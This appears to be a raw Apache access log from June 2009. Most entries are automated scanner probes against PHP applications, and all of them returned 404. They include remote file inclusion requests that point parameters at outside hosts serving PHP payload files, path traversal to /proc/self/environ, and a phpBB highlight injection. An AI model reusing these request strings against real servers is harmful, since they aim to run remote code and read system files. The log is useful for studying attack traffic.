94.23.200.54 - - [19/Jun/2009:01:33:39 -0400] "GET /logs/access_log.Q109051200//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
75.145.152.113 - - [19/Jun/2009:01:33:45 -0400] "GET /logs/access_log.Q109050700%20%20//appserv/main.php?appserv_root=http://food114.tv/banner/shirohige/fxid.txt???? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
209.59.12.99 - - [19/Jun/2009:01:33:47 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
38.99.13.118 - - [19/Jun/2009:01:34:03 -0400] "GET /logs/error_log.Q108040500 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
69.61.82.82 - - [19/Jun/2009:01:34:05 -0400] "GET /logs/access_log.Q109052400/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 269 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
69.61.82.82 - - [19/Jun/2009:01:34:05 -0400] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 242 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
69.61.82.82 - - [19/Jun/2009:01:34:05 -0400] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 247 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
69.61.82.82 - - [19/Jun/2009:01:34:10 -0400] "GET /logs/access_log.Q109052400/errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 235 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
69.61.82.82 - - [19/Jun/2009:01:34:10 -0400] "GET /errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 208 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
69.61.82.82 - - [19/Jun/2009:01:34:10 -0400] "GET /logs/errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 213 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
87.230.22.39 - - [19/Jun/2009:01:34:14 -0400] "GET /logs/access_log.Q109051800//galeria.php?start=0&kategoria=http://kotz.org/images/extras/id.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
87.230.22.39 - - [19/Jun/2009:01:34:14 -0400] "GET /logs//galeria.php?start=0&kategoria=http://kotz.org/images/extras/id.txt??? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
87.230.22.39 - - [19/Jun/2009:01:34:14 -0400] "GET //galeria.php?start=0&kategoria=http://kotz.org/images/extras/id.txt??? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
87.230.22.39 - - [19/Jun/2009:01:34:14 -0400] "GET /logs/access_log.Q109060100//galeria.php?start=0&kategoria=http://kotz.org/images/extras/id.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
69.61.82.82 - - [19/Jun/2009:01:34:15 -0400] "GET /logs/access_log.Q109052400/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 269 "-" "XXXXXX"
69.61.82.82 - - [19/Jun/2009:01:34:15 -0400] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 242 "-" "XXXXXX"
69.61.82.82 - - [19/Jun/2009:01:34:15 -0400] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 247 "-" "XXXXXX"
69.61.82.82 - - [19/Jun/2009:01:34:20 -0400] "GET /logs/access_log.Q109052400/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 269 "-" "XXXXXX"
69.61.82.82 - - [19/Jun/2009:01:34:20 -0400] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 242 "-" "XXXXXX"
69.61.82.82 - - [19/Jun/2009:01:34:20 -0400] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 247 "-" "XXXXXX"
124.138.156.3 - - [19/Jun/2009:01:34:51 -0400] "GET /logs//appserv/main.php?appserv_root=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
124.138.156.3 - - [19/Jun/2009:01:34:51 -0400] "GET //appserv/main.php?appserv_root=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
124.138.156.3 - - [19/Jun/2009:01:34:51 -0400] "GET /logs/access_log.Q109051800//appserv/main.php?appserv_root=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
124.138.156.3 - - [19/Jun/2009:01:35:24 -0400] "GET /logs/access_log.Q109060100//appserv/main.php?appserv_root=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
69.61.82.82 - - [19/Jun/2009:01:35:27 -0400] "GET /logs/error_log.Q109052400/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 268 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
118.129.166.10 - - [19/Jun/2009:01:35:31 -0400] "GET /logs/access_log.Q109052200%20%20/errors.php?error=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
69.61.82.82 - - [19/Jun/2009:01:35:32 -0400] "GET /logs/error_log.Q109052400/errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 234 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
87.230.22.39 - - [19/Jun/2009:01:35:37 -0400] "GET //components/com_artforms/assets/captcha/includes/captchaform/mp3captcha.php?mosConfig_absolute_path=http://www.motherwellfc.co.uk/fx1.txt??? HTTP/1.1" 404 273 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)"
87.230.22.39 - - [19/Jun/2009:01:35:37 -0400] "GET /logs//components/com_artforms/assets/captcha/includes/captchaform/mp3captcha.php?mosConfig_absolute_path=http://www.motherwellfc.co.uk/fx1.txt??? HTTP/1.1" 404 278 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)"
87.230.22.39 - - [19/Jun/2009:01:35:37 -0400] "GET /logs/access_log.Q109060300//components/com_artforms/assets/captcha/includes/captchaform/mp3captcha.php?mosConfig_absolute_path=http://www.motherwellfc.co.uk/fx1.txt??? HTTP/1.1" 404 300 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)"
69.61.82.82 - - [19/Jun/2009:01:35:38 -0400] "GET /logs/error_log.Q109052400/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 268 "-" "XXXXXX"
69.61.82.82 - - [19/Jun/2009:01:35:43 -0400] "GET /logs/error_log.Q109052400/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 268 "-" "XXXXXX"
87.230.22.39 - - [19/Jun/2009:01:35:57 -0400] "GET /logs/access_log.Q109052900//components/com_artforms/assets/captcha/includes/captchaform/mp3captcha.php?mosConfig_absolute_path=http://www.motherwellfc.co.uk/fx1.txt??? HTTP/1.1" 404 300 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)"
38.99.13.118 - - [19/Jun/2009:01:36:21 -0400] "GET /logs/access_log.Q108081000 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
87.230.22.39 - - [19/Jun/2009:01:37:07 -0400] "GET //components/com_artforms/assets/captcha/includes/captchaform/mp3captcha.php?mosConfig_absolute_path=http://www.motherwellfc.co.uk/fx1.txt??? HTTP/1.1" 404 273 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)"
87.230.22.39 - - [19/Jun/2009:01:37:07 -0400] "GET /logs//components/com_artforms/assets/captcha/includes/captchaform/mp3captcha.php?mosConfig_absolute_path=http://www.motherwellfc.co.uk/fx1.txt??? HTTP/1.1" 404 278 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)"
87.230.22.39 - - [19/Jun/2009:01:37:07 -0400] "GET /logs/access_log.Q109060300//components/com_artforms/assets/captcha/includes/captchaform/mp3captcha.php?mosConfig_absolute_path=http://www.motherwellfc.co.uk/fx1.txt??? HTTP/1.1" 404 300 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)"
87.230.22.39 - - [19/Jun/2009:01:37:17 -0400] "GET /logs/access_log.Q109051600//components/com_artforms/assets/captcha/includes/captchaform/mp3captcha.php?mosConfig_absolute_path=http://www.motherwellfc.co.uk/fx1.txt??? HTTP/1.1" 404 300 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)"
66.249.71.14 - - [19/Jun/2009:01:38:24 -0400] "GET /images/items/CONFORM_THUMB.JPG HTTP/1.1" 304 - "-" "Googlebot-Image/1.0"
209.59.12.99 - - [19/Jun/2009:01:38:53 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
91.121.137.51 - - [19/Jun/2009:01:39:59 -0400] "GET /logs//pollphp/textfile//admin/common.inc.php?base_path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
91.121.137.51 - - [19/Jun/2009:01:39:59 -0400] "GET //pollphp/textfile//admin/common.inc.php?base_path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
91.121.137.51 - - [19/Jun/2009:01:39:59 -0400] "GET /logs/access_log.Q109051800//pollphp/textfile//admin/common.inc.php?base_path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
94.23.200.54 - - [19/Jun/2009:01:40:01 -0400] "GET //pollphp/textfile//admin/common.inc.php?base_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
94.23.200.54 - - [19/Jun/2009:01:40:01 -0400] "GET /logs//pollphp/textfile//admin/common.inc.php?base_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
94.23.200.54 - - [19/Jun/2009:01:40:01 -0400] "GET /logs/access_log.Q109051800//pollphp/textfile//admin/common.inc.php?base_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
94.23.200.54 - - [19/Jun/2009:01:40:01 -0400] "GET //pollphp/textfile//admin/common.inc.php?base_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
94.23.200.54 - - [19/Jun/2009:01:40:01 -0400] "GET /logs//pollphp/textfile//admin/common.inc.php?base_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
94.23.200.54 - - [19/Jun/2009:01:40:01 -0400] "GET /logs/access_log.Q109051800//pollphp/textfile//admin/common.inc.php?base_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
66.249.71.54 - - [19/Jun/2009:01:41:03 -0400] "GET /images/download_bonescrew.jpg HTTP/1.1" 200 3310 "-" "Googlebot-Image/1.0"
123.143.98.5 - - [19/Jun/2009:01:41:44 -0400] "GET /errors.php?error=http://dmpacking.com/bbs/data/main/mawar.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
123.143.98.5 - - [19/Jun/2009:01:41:44 -0400] "GET /logs/errors.php?error=http://dmpacking.com/bbs/data/main/mawar.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
123.143.98.5 - - [19/Jun/2009:01:41:44 -0400] "GET /logs/access_log.Q109052100/errors.php?error=http://dmpacking.com/bbs/data/main/mawar.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
38.99.13.118 - - [19/Jun/2009:01:42:25 -0400] "GET /logs/error_log.Q108071300 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
203.94.155.59 - - [19/Jun/2009:01:42:44 -0400] "GET /technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://saglikmuzesi.trakya.edu.tr/components/com_morfeoshow/id1.txt?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
203.94.155.59 - - [19/Jun/2009:01:42:44 -0400] "GET /logs/technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://saglikmuzesi.trakya.edu.tr/components/com_morfeoshow/id1.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
203.94.155.59 - - [19/Jun/2009:01:42:44 -0400] "GET /logs/access_log.Q109051800/technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://saglikmuzesi.trakya.edu.tr/components/com_morfeoshow/id1.txt?? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
94.23.200.54 - - [19/Jun/2009:01:42:51 -0400] "GET /logs/access_log.Q109051800%20%20//pollphp/textfile//admin/common.inc.php?base_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
94.23.200.54 - - [19/Jun/2009:01:42:52 -0400] "GET /logs/access_log.Q109051800%20%20//pollphp/textfile//admin/common.inc.php?base_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
91.121.137.51 - - [19/Jun/2009:01:42:55 -0400] "GET /logs/access_log.Q109051800%20%20//pollphp/textfile//admin/common.inc.php?base_path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
203.94.155.59 - - [19/Jun/2009:01:42:56 -0400] "GET /technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://saglikmuzesi.trakya.edu.tr/components/com_morfeoshow/id1.txt?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
203.94.155.59 - - [19/Jun/2009:01:42:56 -0400] "GET /logs/technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://saglikmuzesi.trakya.edu.tr/components/com_morfeoshow/id1.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
203.94.155.59 - - [19/Jun/2009:01:42:56 -0400] "GET /logs/access_log.Q109051800%20%20/technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://saglikmuzesi.trakya.edu.tr/components/com_morfeoshow/id1.txt?? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
203.94.155.59 - - [19/Jun/2009:01:43:33 -0400] "GET /logs/technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://saglikmuzesi.trakya.edu.tr/components/com_morfeoshow/id1.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
203.94.155.59 - - [19/Jun/2009:01:43:33 -0400] "GET /technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://saglikmuzesi.trakya.edu.tr/components/com_morfeoshow/id1.txt?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
203.94.155.59 - - [19/Jun/2009:01:43:33 -0400] "GET /logs/access_log.Q109051800/technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://saglikmuzesi.trakya.edu.tr/components/com_morfeoshow/id1.txt?? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
123.143.98.5 - - [19/Jun/2009:01:43:43 -0400] "GET /logs/access_log.Q109052100%20%20/errors.php?error=http://dmpacking.com/bbs/data/main/mawar.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
203.94.155.59 - - [19/Jun/2009:01:44:04 -0400] "GET /logs/access_log.Q109031800/technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://saglikmuzesi.trakya.edu.tr/components/com_morfeoshow/id1.txt?? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
195.2.72.39 - - [19/Jun/2009:01:44:16 -0400] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.peb.com.ua/ua/ech.txt??? HTTP/1.1" 404 241 "-" "libwww-perl/5.63"
94.23.200.54 - - [19/Jun/2009:01:44:17 -0400] "GET //com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
94.23.200.54 - - [19/Jun/2009:01:44:17 -0400] "GET //com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
195.2.72.39 - - [19/Jun/2009:01:44:18 -0400] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.hfuknord.de/404.txt? HTTP/1.1" 404 241 "-" "libwww-perl/5.63"
91.121.137.51 - - [19/Jun/2009:01:44:26 -0400] "GET //com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
91.121.137.51 - - [19/Jun/2009:01:44:28 -0400] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
123.143.98.5 - - [19/Jun/2009:01:44:39 -0400] "GET /logs/access_log.Q109052100/errors.php?error=http://dmpacking.com/bbs/data/main/mawar.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
123.143.98.5 - - [19/Jun/2009:01:44:39 -0400] "GET /errors.php?error=http://dmpacking.com/bbs/data/main/mawar.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
91.121.137.51 - - [19/Jun/2009:01:44:40 -0400] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
91.121.137.51 - - [19/Jun/2009:01:44:40 -0400] "GET /logs/access_log.Q109051500//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
91.121.137.51 - - [19/Jun/2009:01:44:40 -0400] "GET /logs/access_log.Q109060600//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
123.143.98.5 - - [19/Jun/2009:01:44:40 -0400] "GET /logs/errors.php?error=http://dmpacking.com/bbs/data/main/mawar.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
66.249.71.14 - - [19/Jun/2009:01:44:43 -0400] "GET /cgi-bin/LANSAWEB?PROCFUN+WORDPR01+FULLIMG+M37+FUNCPARMS+WEBCMP(S0020):1+WEBSSN(A0240):L0048644B1D22B100301E04S+WSEQ(S0060):1+OUITEM(A0200):04942005 HTTP/1.1" 200 27021 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
94.23.200.54 - - [19/Jun/2009:01:44:45 -0400] "GET /logs//com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
94.23.200.54 - - [19/Jun/2009:01:44:45 -0400] "GET /logs//com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
94.23.200.54 - - [19/Jun/2009:01:44:45 -0400] "GET /logs/access_log.Q109051300//com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
94.23.200.54 - - [19/Jun/2009:01:44:45 -0400] "GET /logs/access_log.Q109051300//com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
94.23.200.54 - - [19/Jun/2009:01:44:53 -0400] "GET //com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
94.23.200.54 - - [19/Jun/2009:01:44:53 -0400] "GET /logs/access_log.Q109051300%20%20//com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
94.23.200.54 - - [19/Jun/2009:01:44:53 -0400] "GET /logs//com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
94.23.200.54 - - [19/Jun/2009:01:44:53 -0400] "GET /logs/access_log.Q109051300%20%20//com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
94.23.200.54 - - [19/Jun/2009:01:44:53 -0400] "GET /logs//com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
94.23.200.54 - - [19/Jun/2009:01:44:53 -0400] "GET //com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
91.121.137.51 - - [19/Jun/2009:01:44:53 -0400] "GET /logs//com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
91.121.137.51 - - [19/Jun/2009:01:44:53 -0400] "GET /logs/access_log.Q109051300//com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
91.121.137.51 - - [19/Jun/2009:01:44:53 -0400] "GET /logs/access_log.Q109051300%20%20//com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
91.121.137.51 - - [19/Jun/2009:01:44:53 -0400] "GET //com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
91.121.137.51 - - [19/Jun/2009:01:44:53 -0400] "GET /logs//com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
94.23.200.54 - - [19/Jun/2009:01:44:56 -0400] "GET //com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
94.23.200.54 - - [19/Jun/2009:01:44:56 -0400] "GET /logs/access_log.Q109051300//com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
94.23.200.54 - - [19/Jun/2009:01:44:56 -0400] "GET /logs//com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
94.23.200.54 - - [19/Jun/2009:01:44:56 -0400] "GET /logs//com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
94.23.200.54 - - [19/Jun/2009:01:44:56 -0400] "GET //com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
94.23.200.54 - - [19/Jun/2009:01:44:56 -0400] "GET /logs/access_log.Q109051300//com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
91.121.137.51 - - [19/Jun/2009:01:45:04 -0400] "GET //com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
91.121.137.51 - - [19/Jun/2009:01:45:04 -0400] "GET /logs//com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
91.121.137.51 - - [19/Jun/2009:01:45:04 -0400] "GET /logs/access_log.Q109051300//com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
203.94.155.59 - - [19/Jun/2009:01:45:06 -0400] "GET /logs/access_log.Q109052800//include/mail.inc.php?skin_board_path=http://125.163.251.219/har/fx29id1.txt??? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
203.94.155.59 - - [19/Jun/2009:01:45:06 -0400] "GET //include/mail.inc.php?skin_board_path=http://125.163.251.219/har/fx29id1.txt??? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
203.94.155.59 - - [19/Jun/2009:01:45:11 -0400] "GET /logs//include/mail.inc.php?skin_board_path=http://125.163.251.219/har/fx29id1.txt??? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
209.59.12.99 - - [19/Jun/2009:01:45:14 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
94.23.200.54 - - [19/Jun/2009:01:45:21 -0400] "GET /logs/access_log.Q109052200//com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
94.23.200.54 - - [19/Jun/2009:01:45:21 -0400] "GET /logs/access_log.Q109052200//com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
94.23.200.54 - - [19/Jun/2009:01:45:38 -0400] "GET /logs/access_log.Q109052200%20%20//com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
220.225.235.178 - - [19/Jun/2009:01:45:40 -0400] "GET /cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):S+QSRKEY(A0300):1491018 HTTP/1.0" 200 45272 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; .NET CLR 1.1.4322)"
